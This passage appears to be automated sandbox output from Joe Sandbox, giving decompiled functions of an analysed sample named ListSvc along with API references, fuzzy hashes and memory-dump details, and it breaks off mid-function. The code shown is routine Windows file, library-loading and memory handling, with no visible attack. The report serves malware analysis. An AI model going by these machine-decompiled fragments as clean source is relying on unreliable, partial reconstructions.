Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55
libraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00427155
0x00427157
0x0042716c
0x00427177
0x00427178
0x0042717d
0x00427180
0x0042718b
0x00427190
0x00427198
0x0042719d
0x004271a0
0x004271a3
0x004271b0
0x0042716e
0x00427170
0x004271c9
0x004271c9

APIs

DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698

Uniqueness

Uniqueness Score: -1.00%

Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

APIs

SetErrorMode.KERNEL32 ref: 0042123A
LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574

Uniqueness

Uniqueness Score: -1.00%

Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}

APIs

VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C

Uniqueness

Uniqueness Score: -1.00%

Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}

0x004232f3
0x0042330b
0x00423313
0x00423317
0x00423320
0x00423312
0x00423312
0x00423312
0x00000000
0x00423322
0x00423322
0x00423326
0x00000000
0x00000000
0x00423326
0x00000000
0x00423320
0x00423339

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E

Uniqueness

Uniqueness Score: -1.00%

Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}

0x00422a1b
0x00422a22
0x00422a23
0x00422a28
0x00422a2b
0x00422a33
0x00422a41
0x00422a4a
0x00422a4d
0x00422a50
0x00422a5d

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418

Uniqueness

Uniqueness Score: -1.00%

Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}

0x00423de5
0x00423ded

APIs

CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC

Uniqueness

Uniqueness Score: -1.00%

Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x00409fb0
0x00409fb2
0x00409fb6
0x00409fc6
0x00409fcf
0x00409fd4
0x00409fd6
0x00409fdb
0x00409fe0
0x00409fe0
0x00409fdb
0x00409fee

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6

Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}

0x00423ed9
0x00423edf
0x00423ee6
0x00000000
0x00423eea
0x00423ef0

APIs

SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF

Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}

0x0040caa8
0x0040cab4

APIs

GetSystemInfo.KERNEL32 ref: 0040CAA8

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB

Uniqueness

Uniqueness Score: -1.00%

Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88

Uniqueness

Uniqueness Score: -1.00%

Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Virtual$Free$Query
String ID:
API String ID: 778034434-0
Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
